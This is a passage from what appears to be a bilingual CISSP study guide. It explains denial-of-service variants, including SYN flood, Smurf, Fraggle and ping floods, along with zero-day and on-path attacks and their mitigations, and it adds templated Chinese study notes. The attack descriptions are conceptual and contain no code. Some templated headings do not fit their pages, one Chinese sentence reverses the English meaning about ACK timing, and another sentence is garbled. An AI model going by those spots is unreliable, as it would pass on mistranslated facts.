In other words, if attackers can access a system via the Internet, it is highly susceptible to a DoS attack. In contrast, DoS attacks are not common for internal systems that are not directly accessible via the Internet. Similarly, many DDoS attacks target internet-facing systems. There isn't a single DoS or DDoS attack, but these represent types of attacks. Malicious actors are continually creating or discovering new ways to attack systems and have used different protocols doing so. The following sections discuss several specific attacks, and some of these are DoS or DDoS attacks. The basic preventive measures discussed previously can prevent or mitigate many DoS and DDoS attacks.

Additionally, many security companies provide dedicated DDoS mitigation services. These services can sometimes divert or filter enough malicious traffic that the attack doesn't impact users at all.

中文直译 / 整理

其他形式的DoS攻击侧重于利用操作系统、服务或应用程序中已知的故障或漏 洞。 利用这些故障通常会导致系统崩溃或CPU使用率达到100%。 无论实际攻 击的具体内容如何,任何使受害者无法正常执行活动的攻击都属于DoS攻击。 DoS攻击可能导致性能下降、系统崩溃、系统重启、数据损坏、服务阻塞等。 拒绝服务(DoS)攻击来自单个系统,并针对单个系统。 当然,这很容易暴露 攻击源。 攻击者通常通过伪造源地址来保持匿名。 其他时候,他们会利用被攻 陷的系统发起攻击。 关键在于,DoS攻击中的源地址很少是攻击者的IP地址。 另一种形式的DoS攻击是分布式拒绝服务(DDoS)攻击。 当多个系统同时攻 击单个系统时,就会发生DDoS攻击。 例如,一组攻击者会协同针对单个系统 发起攻击。 但如今更常见的情况是,攻击者会攻陷多个系统,并将它们用作针 对其他受害者的攻击平台。 攻击者通常使用僵尸网络发起DDoS攻击,如前一 节所述。 DoS攻击通常针对面向互联网的系统。 换句话说,如果攻击者可以通过 互联网访问某个系统,那么该系统极易遭受DoS攻击。 相比之下,无法直接 通过互联网访问的内部系统则较少遭受DoS攻击。

同样,许多DDoS攻击也 针对面向互联网的系统。 并不存在单一的DoS或DDoS攻击,但这些代表了攻击的类型。 恶意行为者不 断创建或发现新的攻击系统方式,并使用了不同的协议进行攻击。 以下部分讨 论了几种具体的攻击,其中一些是DoS或DDoS攻击。 前面讨论的基本预防措施可以防止或缓解许多拒绝服务(DoS)和分布式拒绝 服务(DDoS)攻击。 此外,许多安全公司提供专用的DDoS缓解服务。 这些 服务有时能够分流或过滤足够的恶意流量,使攻击完全不影响用户。

小白解释

场景先行:你是公司的安全负责人,正在读第 1154 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1154 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 18 / PDF P1155

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

A distributed reflective denial-of-service (DRDoS) attack is a variant of a DoS. It uses a reflected approach to an attack. In other words, it doesn't attack the victim directly but instead manipulates traffic or a network service so that the attacks are reflected back to the victim from other sources. DNS poisoning attacks (covered in Chapter 12), Smurf attacks, and Fraggle attacks (both covered later in this chapter) are examples. SYN Flood Attack The SYN flood attack is a common DoS attack. It disrupts the standard threeway handshake used by Transmission Control Protocol (TCP) to initiate communication sessions.

Normally, a client sends a SYN (synchronize) packet to a server, the server responds with a SYN/ACK (synchronize/acknowledge) packet to the client, and the client then responds with an ACK (acknowledge) packet back to the server. This three-way handshake establishes a communication session that the two systems use for data transfer until the session is terminated with the FIN (finish) or the RST (reset) packet. Chapter 11 discussed the TCP three-way handshake and the TCP communications session in more depth. However, in a SYN flood attack, the attackers send multiple SYN packets but never complete the connection with an ACK.

This is similar to a jokester sticking their hand out to shake hands, but when the other person sticks their hand out in response, the jokester pulls back, leaving the other person hanging. Figure 17.2 shows an example. Here, a single attacker has sent three SYN packets and the server has responded to each. For each of these requests, the server has reserved system resources to wait for the ACK packet. Servers often wait for the ACK packet for as long as 3 minutes before aborting the attempted session, though administrators can adjust this time.

中文直译 / 整理

一个 分布式反射拒绝服务(DRDoS) 攻击是拒绝服务(DoS)的一种变体。 它 采用反射方式实施攻击。 换句话说,它不直接攻击目标,而是操纵流量或网络 服务,使攻击从其他来源反射回目标。 DNS投毒攻击(见第12章)、Smurf攻 击和Fraggle攻击(本章后面将介绍)都是此类攻击的例子。 SYN 洪水攻击 SYN洪水攻击是一种常见的拒绝服务(DoS)攻击。 它破坏了传输控制协议 (TCP)用于启动通信会话的标准三次握手过程。 通常情况下,客户端向服务 器发送一个SYN(同步)数据包,服务器响应一个SYN/ACK(同步/确认)数 据包给客户端,然后客户端再向服务器发送一个ACK(确认)数据包。 这种三 次握手建立了两个系统之间用于数据传输的通信会话,直到会话通过FIN(结 束)或RST(重置)数据包终止。 第11章更深入地讨论了TCP三次握手和TCP通信会话。 然而,在SYN洪水攻击中,攻击者发送多个SYN数据包,但从不通过ACK完成 连接。 这类似于一个恶作剧者伸出手要握手,但当对方也伸出手回应时,恶作 剧者却缩回手,让对方尴尬地悬在半空。 图 17.2展示了一个示例。

在此情况下,单个攻击者发送了三个 SYN 数据包, 服务器对每个数据包都做出了响应。 对于每个请求,服务器都会保留系统资源 以等待 ACK 数据包。 服务器通常会等待 ACK 数据包长达 3 分钟,然后才中 止尝试的会话,但管理员可以调整此时间。

小白解释

场景先行:你是公司的安全负责人,正在读第 1155 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
学习单元 19 / PDF P1156

第 1156 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 17.2 SYN flood attack Three incomplete sessions won't cause a problem. However, an attacker will send hundreds or thousands of SYN packets to the victim. Each incomplete session consumes resources, and at some point, the victim becomes overwhelmed and is not able to respond to legitimate requests. The attack can consume available memory and processing power, resulting in the victim slowing to a crawl or actually crashing. It's common for the attacker to spoof the source address, with each SYN packet having a different source address. This makes it difficult to block the attacker using the source Internet Protocol (IP) address.

Attackers have also coordinated attacks launching simultaneous attacks against a single victim as a DDoS attack from a botnet. Limiting the number of allowable open sessions isn't effective as a defense because once the system reaches the limit, it blocks session requests from legitimate users. Increasing the number of allowable sessions on a server results in the attack consuming more system resources, and a server has a finite amount of RAM and processing power. Using SYN cookies is one method of blocking this attack. These small records consume very few system resources versus the typical resources set aside by a server upon the receipt of a SYN packet from a client.

When the server receives an ACK, it checks the SYN cookies and establishes a session. Firewalls often include mechanisms to check for SYN attacks, as do intrusion detection and prevention systems. Another method of blocking this attack is to reduce the amount of time a server will wait for an ACK. It is typically 3 minutes by default, but in normal

中文直译 / 整理

图 17.2 SYN 洪水攻击 三个不完整的会话不会造成问题。 然而,攻击者会向受害者发送数百甚至数千 个 SYN 数据包。 每个不完整的会话都会消耗资源,当达到某个临界点时,受害 者将不堪重负,无法响应合法请求。 该攻击会消耗可用的内存和处理能力,导 致受害者速度急剧下降甚至崩溃。 攻击者通常会伪造源地址,每个 SYN 数据包都具有不同的源地址。 这使得很难 通过源互联网协议(IP)地址来阻止攻击者。 攻击者还协调了来自僵尸网络的 同步攻击,对单一受害者发起大规模 DDoS 攻击。 限制允许的打开会话数量并 不能有效防御,因为一旦系统达到限制,就会阻止合法用户的会话请求。 增加 服务器上允许的会话数量会导致攻击消耗更多的系统 资源,而服务器的内存和处理能力是有限的。 使用 SYN Cookie 是阻止此攻击的一种方法。 这些小型记录相比服务器在收到 客户端 SYN 数据包时通常预留的资源,消耗的系统资源极少。 当服务器收到 ACK 时,它会检查 SYN Cookie 并建立会话。 防火墙通常包含检测 SYN 攻击 的机制,入侵检测和预防系统也是如此。 阻止的另一种方法 g 此攻击旨在减少 服务器将等待确认。

默认情况下通常为3分钟,但在正常

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1156 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
防火墙 防火墙根据规则控制网络流量进出。
学习单元 20 / PDF P1157

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

operation it rarely takes a legitimate system three minutes to send the ACK packet. By reducing the time, half-open sessions are flushed from the system's memory more quickly. TCP Reset Attack Another type of attack that manipulates the TCP session is the TCP reset attack. Sessions are normally terminated with either the FIN (finish) or the RST (reset) packet. Attackers can spoof the source IP address in a RST packet and disconnect active sessions. The two systems then need to reestablish the session. This is primarily a threat for systems that need persistent sessions to maintain data with other systems.

When the session is reestablished, they need to re-create the data, so it's much more involved than just sending three packets back and forth to establish the session. Smurf and Fraggle Attacks Smurf and Fraggle attacks are both DoS attacks. A Smurf attack is another type of flood attack, but it floods the victim with Internet Control Message Protocol (ICMP) echo reply packets instead of with TCP SYN packets. More specifically, it is a spoofed broadcast ping request using the IP address of the victim as the source IP address. That's a mouthful, so it's worthwhile to break it down. Ping uses ICMP to check connectivity with remote systems.

Normally, ping sends an echo request to a single system, and the system responds with an echo reply. However, in a Smurf attack the attacker sends the echo request out as a broadcast to all systems on the network and spoofs the source IP address. All these systems respond with echo replies to the spoofed IP address, flooding the victim with traffic. Smurf attacks take advantage of an amplifying network (also called a Smurf amplifier) by sending a directed broadcast through a router. All systems on the amplifying network then attack the victim. However, RFC 2644, released in 1999, changed the standard default for routers so that they do not forward directed broadcast traffic.

When administrators correctly configure routers in compliance with RFC 2644, a network cannot be an amplifying network. This limits Smurf attacks to a single network. Additionally, it is common to disable ICMP on firewalls, routers, and even many servers to prevent this type of

中文直译 / 整理

操作,合法系统通常需要三分钟才能发送ACK数据包。 通过缩短该时间,半 开会话能更快地从系统内存中清除。 TCP重置攻击 另一种操纵TCP会话的攻击是TCP重置攻击。 会话通常通过FIN(结束)或 RST(重置)数据包终止。 攻击者可以在RST数据包中伪造源IP地址,从而 断开活动会话。 随后,两个系统需要重新建立会话。 这对需要持久会话以与 其他系统保持数据的系统构成主要威胁。 当会话重新建立时,它们需要重新 创建数据,因此这一过程远比仅发送三个数据包来回建立会话复杂得多。 Smurf和Fraggle攻击 Smurf和Fraggle攻击都是DoS攻击。 Smurf攻击是另一种类型的泛洪攻击,但 它向受害者发送的是互联网控制消息协议(ICMP)回显应答数据包,而不是 TCP SYN数据包。 更具体地说,这是一种使用受害者IP地址作为源IP地址的欺 骗性广播ping请求。 这听起来很复杂,因此值得拆解分析。 Ping 使用 ICMP 检查与远程系统的连接。 通常,ping 会向单个系统发送回 显请求,系统会以回显应答响应。 然而,在 Smurf 攻击中,攻击者将回显 请求作为广播发送到网络上的所有系统,并伪造源 IP 地址。

这些系统都会 向伪造的 IP 地址发送回显应答,从而用流量淹没受害者。 Smurf攻击利用一个放大网络(也称为Smurf放大器),通过路由器发送定向 广播。 放大网络上的所有系统随后会攻击目标。 然而,1999年发布的RFC 2644更改了路由器的标准默认设置,使其不再转发定向广播流量。 当管理员正 确配置符合RFC 2644的路由器时,网络将无法成为放大网络。 这将Smurf攻击 限制在单个网络内。 此外,为防止此类攻击,通常会在防火墙、路由器甚至许 多服务器上禁用ICMP。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
防火墙 防火墙根据规则控制网络流量进出。
学习单元 21 / PDF P1158

第 1158 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

attack using ICMP. When standard security practices are used, Smurf attacks are rarely a problem today. Fraggle attacks are similar to Smurf attacks. However, instead of using ICMP, a Fraggle attack uses UDP packets over UDP port 7 (echo protocol) and port 19 (character generator protocol). The Fraggle attack will broadcast a UDP packet using the spoofed IP address of the victim. All systems on the network will then send traffic to the victim, just as with a Smurf attack. A variant of a Fraggle attack is a UDP flooding attack using random UDP ports. Ping Flood A ping flood attack floods a victim with ping requests.

This can be very effective when launched by bots within a botnet as a DDoS attack. If tens of thousands of systems simultaneously send ping requests to a system, the system can be overwhelmed trying to answer the ping requests. The victim will not have time to respond to legitimate requests. A common way that systems handle this today is by blocking ICMP echo request packets. This blocks the ping traffic but not all ICMP traffic. Active intrusion detection systems can detect a ping flood and modify the environment to block ICMP echo requests during the attack.

中文直译 / 整理

使用ICMP的攻击。 当采用标准安全实践时,Smurf攻击如今已很少构成威胁。 Fraggle 攻击与 Smurf 攻击类似。 然而,Fraggle 攻击不使用 ICMP,而是使 用 UDP 协议的端口 7(回显协议)和端口 19(字符生成协议)发送 UDP 数据 包。 Fraggle 攻击会使用伪造的受害者 IP 地址广播 UDP 数据包。 网络上的所 有系统都会向受害者发送流量,这与 Smurf 攻击类似。 Fraggle 攻击的一个变 种是使用随机 UDP 端口的 UDP 泛洪攻击。 Ping 洪水攻击 ping洪水攻击 会向受害者发送大量 ping 请求。 当由僵尸网络中的机器人作 为 DDoS 攻击发起时,这种攻击可能非常有效。 如果数以万计的系统同时向 一个系统发送 ping 请求,该系统将因试图响应这些 ping 请求而不堪重负。 受害者将没有时间处理合法请求。 系统如今处理此问题的常见方式是阻止ICMP回显请求数据包。 这会阻止 ping流量,但不会阻止所有ICMP流量。 主动入侵检测系统可以检测到 ping洪水攻击,并在攻击期间修改环境以阻止ICMP回显请求。

小白解释

场景先行:你是公司的安全负责人,正在读第 1158 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1158 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
标准 标准给出必须满足的最低要求。
学习单元 22 / PDF P1159

第 1159 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Legacy Attacks Many attacks that were successful in the past aren't successful today. However, attackers have a long history of creating attack variants that do succeed. We can't predict what those variants will be next year, but understanding some of the legacy attacks makes it easier to recognize the new variants when they appear. We've listed a few here: Ping of Death: A Ping-of-Death attack used oversized ping packets. Some operating systems couldn't handle them. In some cases, the systems crashed, and in other cases, the attack caused a buffer overflow error.

Teardrop: A Teardrop attack fragments IP data packets, making them difficult or impossible to be put back together by the receiving system. This often caused systems to crash. LAND: In a LAND (local area network denial) attack, the attack sends spoofed SYN packets to a victim using the victim's IP address as both the source and destination IP address. A variant is a Banana attack, which redirects outgoing messages from a system back to the system, shutting down all external communication. Many other types of attacks cause buffer overflow errors (discussed in Chapter 21). When vendors discover bugs that can cause a buffer overflow, they release patches to fix them.

One of the best protections against any buffer overflow attack is to keep a system up-todate with current patches. Additionally, production systems should not include untested code or allow the use of system or root-level privileges from applications. Zero-Day Exploit A zero-day exploit refers to an attack on a system exploiting a vulnerability that is unknown to others. However, security professionals use the term in different contexts and it has some minor differences based on the context. Here are some examples:

中文直译 / 整理

传统攻击 许多过去成功的攻击如今已不再有效。 然而,攻击者长期以来一直善于创 建新的变种攻击并取得成功。 我们无法预测明年会出现哪些变种,但了解 一些传统攻击有助于在新变种出现时更容易识别它们。 我们在此列出了一 些示例: 死亡之ping:死亡之ping攻击使用超大的ping数据包。 一些操作系 统无法处理这些数据包。 在某些情况下,系统会崩溃; 在其他情况下, 攻击会导致缓冲区溢出错误。 泪滴攻击:泪滴攻击将IP数据包分片,使得接收系统难以或无法将其 重新组装。 这通常会导致系统崩溃。 LAND攻击:在LAND(局域网拒绝服务)攻击中,攻击者发送伪造 的SYN数据包给受害者,使用受害者的IP地址作为源地址和目标地址。 一种变体是香蕉攻击,它将系统的出站消息重定向回系统本身,从而 中断所有外部通信。 许多其他类型的攻击会导致缓冲区溢出错误(详见第21章)。 当厂商 发现可能导致缓冲区溢出的漏洞时,会发布补丁进行修复。 防止任何缓冲 区溢出攻击的最佳保护措施之一是保持系统及时更新最新补丁。 此外,生 产系统不应包含未经测试的代码,也不应允许应用程序使用系统或根级别 权限。

零日漏洞 一个 零日漏洞利用 指的是攻击者利用一个他人尚不知晓的系统漏洞进行攻 击。 然而,安全专业人员在不同上下文中使用该术语,其含义会因上下文而 略有不同。 以下是一些示例:

小白解释

场景先行:你是公司的安全负责人,正在读第 1159 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1159 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 23 / PDF P1160

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Attacker discovers a vulnerability first. When an attacker discovers a vulnerability, the attacker can easily exploit it because the attacker is the only one aware of the vulnerability. At this point, the vendor is unaware of the vulnerability and has not developed or released a patch. This is the common definition of a zero-day exploit. Vendor learns of vulnerability but hasn't released a patch. When vendors learn of a vulnerability, they evaluate the seriousness of the threat and prioritize the development of a patch. Software patches can be complex and require extensive testing to ensure that the patch does not cause other problems.

Vendors may develop and release patches within days for serious threats, or they may take months to develop and release a patch for a problem they do not consider serious. Attacks exploiting the vulnerability during this time are often called zero-day exploits because the public does not know about the vulnerability. Vendor releases patch and systems are attacked within 24 hours. Once a patch is developed, released, and applied, systems should no longer be vulnerable to the exploit. However, organizations often take time to evaluate and test a patch before applying it, resulting in a gap between when the vendor releases the patch and when administrators apply it.

Microsoft typically releases patches on the second Tuesday of every month, commonly called “Patch Tuesday.” Attackers often try to reverse-engineer the patches to understand them and then exploit them the next day, commonly called “Exploit Wednesday.” Some people refer to an attack the day after the vendor releases a patch as a zero-day attack. If an organization doesn't have an effective patch management system, they can have systems that are vulnerable to known exploits. If an attack occurs weeks or months after a vendor releases a patch, this is not a zero-day exploit. Instead, it is an attack on an unpatched system.

Methods used to protect systems against zero-day exploits include many of the basic preventive measures. Ensure that systems are not running unneeded services and protocols to reduce a system's attack surface, enable both network-based and host-based firewalls to limit potentially malicious traffic, and use intrusion detection and prevention systems to help detect and

中文直译 / 整理

攻击者首先发现漏洞。 当攻击者发现一个漏洞时,由于只有攻击者知晓该漏洞, 因此可以轻松利用它。 此时,厂商尚未察觉该漏洞,也未开发或发布补丁。 这是 零日漏洞利用的常见定义。 供应商已知晓漏洞,但尚未发布补丁。 当供应商发现漏洞时,他们会评估威胁的 严重性,并优先开发补丁。 软件补丁可能很复杂,需要进行广泛的测试,以确保 补丁不会引发其他问题。 对于严重的威胁,供应商可能在几天内开发并发布补丁; 而对于他们认为不严重的漏洞,则可能需要数月时间才能开发和发布补丁。 在此 期间,利用该漏洞的攻击通常被称为零日攻击,因为公众尚未知晓该漏洞的存在。 供应商发布补丁后,系统在24小时内遭到攻击。 一旦补丁开发、发布并应用, 系统应不再容易受到该漏洞的攻击。 然而,组织通常需要时间来评估和测试补 丁,才能应用它,这导致了供应商发布补丁与管理员应用补丁之间存在时间差。 微软通常在每个月的第二个星期二发布补丁,这被称为“补丁星期二”。 攻击 者常常试图逆向分析补丁以理解其内容,然后在第二天利用该漏洞,这通常被 称为“漏洞利用星期三”。 有些人将供应商发布补丁后的第二天发生的攻击称 为零日攻击。

如果一个组织没有有效的补丁管理系统,它们的系统可能会容易受到 已知漏洞的利用。 如果攻击发生在供应商发布补丁数周或数月之后,这并 不是零日漏洞,而是对未打补丁系统的攻击。 用于保护系统免受零日漏洞攻击的方法包括许多基本的预防措施。 确保系统未 运行不必要的服务和协议,以减少系统的攻击面,启用基于网络和基于主机的 防火墙以限制潜在的恶意流量,并使用入侵检测和防御系统来帮助检测和

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
防火墙 防火墙根据规则控制网络流量进出。
学习单元 24 / PDF P1161

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

block potential attacks. Additionally, honeypots give administrators an opportunity to observe attacks and may reveal an attack using a zero-day exploit. Honeypots are explained later in this chapter. Man-in-the-MiddleOn-path Attacks A man-in-the-middle (MiTM) attack (sometimes called an on-path attack) occurs when a malicious user establishes a position between two endpoints of an ongoing communication. In this context, the two endpoints are two computers in a network. Note that the MiTM attacker doesn't need to be physically between the two systems for all MiTM attacks. In attacks, the attacker is simply able to monitor all of the traffic between the two systems.

There are two types of man-in-the-middle attacks. One involves copying or sniffing the traffic between two parties, which is basically a sniffer attack as described in Chapter 14. The other type involves attackers positioning themselves in the line of communication, where they act as a store-andforward or proxy mechanism, as shown in Figure 17.3. The client and server think they are connected directly to each other. However, the malicious actor captures and forwards all data between the two systems. An attacker can collect logon credentials and other sensitive data as well as change the content of messages exchanged between the two systems.

中文直译 / 整理

阻止潜在攻击。 此外,蜜罐为管理员提供了观察攻击的机会,并可能揭示 利用零日漏洞的攻击。 本章后续将详细介绍蜜罐。 中间人攻击 中间人(MiTM)攻击(有时称为中间路径攻击)发生在恶意用户在正在进行通 信的两个端点之间建立位置时。 在此背景下,两个端点是网络中的两台计算机。 请注意,MiTM攻击者并不需要在物理上位于两个系统之间才能实施所有 MiTM攻击。 在攻击中,攻击者只需能够监控两个系统之间的所有流量即可。 中间人攻击有两种类型。 一种是复制或嗅探两方之间的流量,这基本上是第 14章中描述的嗅探攻击。 另一种类型是攻击者将自己的位置置于通信线路中, 充当存储‑转发或代理机制,如图17.3所示。 客户端和服务器认为它们直接相互 连接,但恶意攻击者会捕获并转发两个系统之间的所有数据。 攻击者可以收集 登录凭证和其他敏感数据,还可以更改两系统之间交换的消息内容。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

